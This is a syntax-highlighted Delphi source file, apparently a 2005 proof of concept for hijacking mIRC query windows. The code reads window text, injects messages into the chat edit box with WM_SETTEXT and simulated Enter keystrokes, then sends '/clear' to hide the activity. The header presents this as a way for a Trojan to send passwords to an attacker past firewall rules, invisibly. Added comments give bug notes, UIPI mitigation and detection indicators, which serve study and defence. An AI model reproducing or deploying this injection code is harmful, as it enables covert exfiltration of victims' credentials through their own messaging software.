<pre>
<code><span style="font: 10pt Courier New;"><span class="pas1-comment">//Mirc 6.16 and "generic Edit component" Win32 trick
//
//by rgod _ May 2, 2005
//
//http://rgod.altervista.org
//
//Naturally you know that you can capture Edit box text
//by sending WM_GETTEXT message to it and set text
//by WM_SETTEXT message. Naturally you know you can simulate
//the pressure of a key.
//And what happens when you use Mirc or other messaging software?
//
//In order to test the program, put a Timer in the form,
//compile with Delphi, you have to open two sessions of mirc,
//you authenticate yourselves in a session and you open a
//query in the other. Now, start the project executable.
//In the victim session move on titlebar, where the alter-ego
// nick is visualized and you enjoy the show...
//Here it is how a Trojan can take advantage of mirc and other
//messaging software in order to send to the attacker
//passwords and other stuff, bypassing firewall rules.
//It can all be invisible, naturally
//here the code in Object Pascal...
</span><span class="pas1-reservedword">unit</span><span class="pas1-space"> </span><span class="pas1-identifier">Unit1;
</span><span class="pas1-reservedword">interface
uses
</span><span class="pas1-space"> </span><span class="pas1-identifier">Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
</span><span class="pas1-reservedword">type
{ TForm1 owns a single TTimer; every tick runs Timer1Timer (implementation
  below), which is the entire behaviour of this unit. The timer interval and
  its Enabled state presumably come from the form's .dfm resource, which is
  not visible here. }
</span><span class="pas1-space"> </span><span class="pas1-identifier">TForm1 = </span><span class="pas1-reservedword">class</span><span class="pas1-symbol">(TForm)
Timer1: TTimer;
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">Timer1Timer(Sender: TObject);
</span><span class="pas1-comment">{ Private declarations }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">public
</span><span class="pas1-space"> </span><span class="pas1-comment">{ Public declarations }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">Form1: TForm1;
</span><span class="pas1-reservedword">implementation
</span><span class="pas1-preprocessor">{$R *.dfm}
//function that simulates pressing a key...
{ PostKey: synthesises one press-and-release of virtual key `key` through
  keybd_event, bracketed by press/release of whichever of Ctrl, Shift and Alt
  are present in `shift` (modifiers are released in reverse order).
  specialkey=True adds KEYEVENTF_EXTENDEDKEY to the key-down/key-up flags.
  Caveat: keybd_event takes no window handle, so the keystroke lands in
  whatever window owns keyboard focus at that instant; a focus change between
  the caller's WM_SETTEXT and this call misdirects the key. Microsoft documents
  keybd_event as superseded by SendInput. }
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(key: Word; </span><span class="pas1-reservedword">const</span><span class="pas1-space"> </span><span class="pas1-identifier">shift: TShiftState; specialkey: Boolean);
</span><span class="pas1-reservedword">type
</span><span class="pas1-space"> </span><span class="pas1-identifier">TShiftKeyInfo = </span><span class="pas1-reservedword">record
</span><span class="pas1-space"> </span><span class="pas1-identifier">shift: Byte;
vkey: Byte;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
byteset = </span><span class="pas1-reservedword">set</span><span class="pas1-space"> </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">7</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">const
</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys: </span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">1</span><span class="pas1-symbol">..</span><span class="pas1-number">3</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">TShiftKeyInfo =
((shift: Ord(ssCtrl); vkey: VK_CONTROL),
(shift: Ord(ssShift); vkey: VK_SHIFT),
(shift: Ord(ssAlt); vkey: VK_MENU));
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag: DWORD;
bShift: ByteSet </span><span class="pas1-reservedword">absolute</span><span class="pas1-space"> </span><span class="pas1-identifier">shift;
{ bShift overlays the first byte of the TShiftState set so membership can be
  tested by ordinal against shiftkeys[].shift. This assumes Ord(ssShift),
  Ord(ssAlt) and Ord(ssCtrl) are all less than 8 - true for the classic
  Delphi RTL this was written against; confirm against the TShiftState
  declaration of whatever compiler is used. }
i: Integer;
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">1 </span><span class="pas1-reservedword">to</span><span class="pas1-space"> </span><span class="pas1-number">3 </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys[i].shift </span><span class="pas1-reservedword">in</span><span class="pas1-space"> </span><span class="pas1-identifier">bShift </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, </span><span class="pas1-number">0</span><span class="pas1-symbol">), </span><span class="pas1-number">0</span><span class="pas1-symbol">, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">; </span><span class="pas1-comment">{ For: requested modifiers pressed }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">specialkey </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag := KEYEVENTF_EXTENDEDKEY
</span><span class="pas1-reservedword">else
</span><span class="pas1-space"> </span><span class="pas1-identifier">flag := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
keybd_event(key, MapvirtualKey(key, </span><span class="pas1-number">0</span><span class="pas1-symbol">), flag, </span><span class="pas1-number">0</span><span class="pas1-symbol">); { key down }
flag := flag </span><span class="pas1-reservedword">or</span><span class="pas1-space"> </span><span class="pas1-identifier">KEYEVENTF_KEYUP;
keybd_event(key, MapvirtualKey(key, </span><span class="pas1-number">0</span><span class="pas1-symbol">), flag, </span><span class="pas1-number">0</span><span class="pas1-symbol">); { key up }
</span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">3 </span><span class="pas1-reservedword">downto</span><span class="pas1-space"> </span><span class="pas1-number">1 </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">shiftkeys[i].shift </span><span class="pas1-reservedword">in</span><span class="pas1-space"> </span><span class="pas1-identifier">bShift </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">keybd_event(shiftkeys[i].vkey, MapVirtualKey(shiftkeys[i].vkey, </span><span class="pas1-number">0</span><span class="pas1-symbol">),
KEYEVENTF_KEYUP, </span><span class="pas1-number">0</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">; { For: modifiers released, reverse order }
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-comment">//function that finds the handle of a control, given the handle of its parent window
{ FindControl: returns the handle of the ControlNr-th (1-based) direct child of
  hApp whose window class is ControlClassName, or 0 when there are fewer
  matches. Two defects worth knowing about:
  - ControlNr is a Word, so passing 0 makes Dec(ControlNr) wrap to 65535; the
    loop then walks every match until FindWindowEx returns 0 and the result is
    0. Callers should pass at least 1.
  - When IsWindow(hApp) is false the if-block is skipped and the function still
    falls through to Result := hControl, with hControl never assigned, so the
    caller receives an uninitialised value rather than the 0 set at the top. }
</span><span class="pas1-reservedword">function</span><span class="pas1-space"> </span><span class="pas1-identifier">FindControl(hApp: HWND; ControlClassName: </span><span class="pas1-reservedword">string</span><span class="pas1-symbol">; ControlNr: Word = </span><span class="pas1-number">1</span><span class="pas1-symbol">):
HWND;
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">i: Word;
hControl: HWND; { only assigned inside the IsWindow branch below }
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">Result := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">IsWindow(hApp) </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">Dec(ControlNr); { 1-based to 0-based; wraps when ControlNr = 0 }
hControl := </span><span class="pas1-number">0</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">for</span><span class="pas1-space"> </span><span class="pas1-identifier">i := </span><span class="pas1-number">0 </span><span class="pas1-reservedword">to</span><span class="pas1-space"> </span><span class="pas1-identifier">ControlNr </span><span class="pas1-reservedword">do
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
{ each pass resumes the search after the previous match }
</span><span class="pas1-space"> </span><span class="pas1-identifier">hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), </span><span class="pas1-reservedword">nil</span><span class="pas1-symbol">);
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">hControl = </span><span class="pas1-number">0 </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-identifier">Exit; { no further match: Result stays 0 }
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
Result := hControl; { reached even when IsWindow failed - see header }
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
{ TForm1.Timer1Timer: on each tick, reads the text of the window under the
  mouse cursor with WM_GETTEXT; if that window's class name contains
  'mIRC_Query' and its text contains 'rgod', it pushes 'hello' and then
  '/clear' into the window's first 'Edit' child with WM_SETTEXT, pressing
  Enter after each. This is the cross-process message-injection behaviour the
  file header describes.
  Defender notes: since Windows Vista, UIPI stops a lower-integrity process
  from delivering these messages or synthetic input to a higher-integrity
  window, so running the messaging client at a higher integrity level defeats
  this technique. A process that sends WM_GETTEXT/WM_SETTEXT to windows it does
  not own and also calls keybd_event is a well-known behavioural indicator for
  input-automation and credential-harvesting tooling. The Integer(pointer)
  casts used for LPARAM assume a 32-bit build. }
</span><span class="pas1-reservedword">procedure</span><span class="pas1-space"> </span><span class="pas1-identifier">TForm1.Timer1Timer(Sender: TObject);
</span><span class="pas1-reservedword">var
</span><span class="pas1-space"> </span><span class="pas1-identifier">hWnd: THandle; { appears to shadow the Windows.HWND type name inside this procedure; harmless here since the type is never referenced in the body }
hedit: THandle;
aName: </span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">255</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">Char;
mytext:</span><span class="pas1-reservedword">array</span><span class="pas1-space"> </span><span class="pas1-symbol">[</span><span class="pas1-number">0</span><span class="pas1-symbol">..</span><span class="pas1-number">10000</span><span class="pas1-symbol">] </span><span class="pas1-reservedword">of</span><span class="pas1-space"> </span><span class="pas1-identifier">char; { never zero-initialised - see note at the WM_GETTEXT call }
query: pchar;
rPos: TPoint;
</span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">Boolean(GetCursorPos(rPos)) </span><span class="pas1-reservedword">then
</span><span class="pas1-space"> </span><span class="pas1-reservedword">begin
</span><span class="pas1-space"> </span><span class="pas1-identifier">hwnd:=WindowFromPoint(rPos); { whatever top-level or child window is under the cursor }
sendmessage(hwnd,wm_gettext,</span><span class="pas1-number">10001</span><span class="pas1-symbol">,integer(@mytext));
{ 10001 = Length(mytext) including the terminator, so the size argument
  matches the buffer. If the message fails (invalid, hung or UIPI-protected
  window) mytext keeps its uninitialised stack contents and the strpos below
  scans memory with no guaranteed terminator. SendMessage is also synchronous:
  a hung target stalls this timer handler; SendMessageTimeout would bound it. }
</span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">Boolean(GetClassName(hWnd, aName, </span><span class="pas1-number">256</span><span class="pas1-symbol">)) </span><span class="pas1-reservedword">then</span><span class="pas1-space"> </span><span class="pas1-comment">{ 256 = Length(aName) }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">strpos(aName,</span><span class="pas1-string">'mIRC_Query'</span><span class="pas1-symbol">) <> </span><span class="pas1-reservedword">nil</span><span class="pas1-space"> </span><span class="pas1-reservedword">then</span><span class="pas1-space"> </span><span class="pas1-comment">//mdiChild classname in Mirc
{ both strpos tests are substring matches, not equality: any class name or
  window text merely containing these fragments satisfies them }
</span><span class="pas1-space"> </span><span class="pas1-reservedword">if</span><span class="pas1-space"> </span><span class="pas1-identifier">strpos(mytext,</span><span class="pas1-string">'rgod'</span><span class="pas1-symbol">) <> </span><span class="pas1-reservedword">nil</span><span class="pas1-space"> </span><span class="pas1-reservedword">then</span><span class="pas1-space"> </span><span class="pas1-comment">//attacker nick, it is displayed
</span><span class="pas1-space"> </span><span class="pas1-comment">//in the mdiChild titlebar
</span><span class="pas1-space"> </span><span class="pas1-comment">//while the victim is talking to you
</span><span class="pas1-space"> 
</span><span class="pas1-reservedword">begin</span><span class="pas1-space"> </span><span class="pas1-comment">//now it will send the message...
</span><span class="pas1-space"> </span><span class="pas1-identifier">hedit:=findcontrol(hWnd,</span><span class="pas1-string">'Edit'</span><span class="pas1-symbol">,</span><span class="pas1-number">1</span><span class="pas1-symbol">);
{ hedit is not checked: if no 'Edit' child is found (0), the WM_SETTEXT calls
  below go to HWND 0 and fail silently, but PostKey still injects Enter into
  whatever window currently has keyboard focus. }
query:=</span><span class="pas1-string">'hello'</span><span class="pas1-symbol">; </span><span class="pas1-comment">//only 'hello' this time, if no passwords
</span><span class="pas1-space"> </span><span class="pas1-comment">//have been collected beforehand
</span><span class="pas1-space"> </span><span class="pas1-identifier">sendmessage(hedit,wm_settext,</span><span class="pas1-number">0</span><span class="pas1-symbol">,integer(query)); </span><span class="pas1-comment">//paste text
</span><span class="pas1-space"> </span><span class="pas1-comment">//in the edit box
</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(</span><span class="pas1-number">13</span><span class="pas1-symbol">, [], False); </span><span class="pas1-comment">//simulate pressing Enter (13 = VK_RETURN)
</span><span class="pas1-space"> </span><span class="pas1-identifier">query:=</span><span class="pas1-string">'/clear'</span><span class="pas1-symbol">;
sendmessage(hedit,wm_settext,</span><span class="pas1-number">0</span><span class="pas1-symbol">,integer(query)); </span><span class="pas1-comment">//paste /clear in the edit
</span><span class="pas1-space"> </span><span class="pas1-comment">//box to clear the window; from the victim's side
</span><span class="pas1-space"> </span><span class="pas1-comment">//nothing appears to have happened :)
</span><span class="pas1-space"> </span><span class="pas1-identifier">PostKey(</span><span class="pas1-number">13</span><span class="pas1-symbol">, [], False); </span><span class="pas1-comment">//simulate pressing Enter (13 = VK_RETURN)
</span><span class="pas1-space"> </span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">;
</span><span class="pas1-reservedword">end</span><span class="pas1-symbol">.
</span></span>
</code></pre>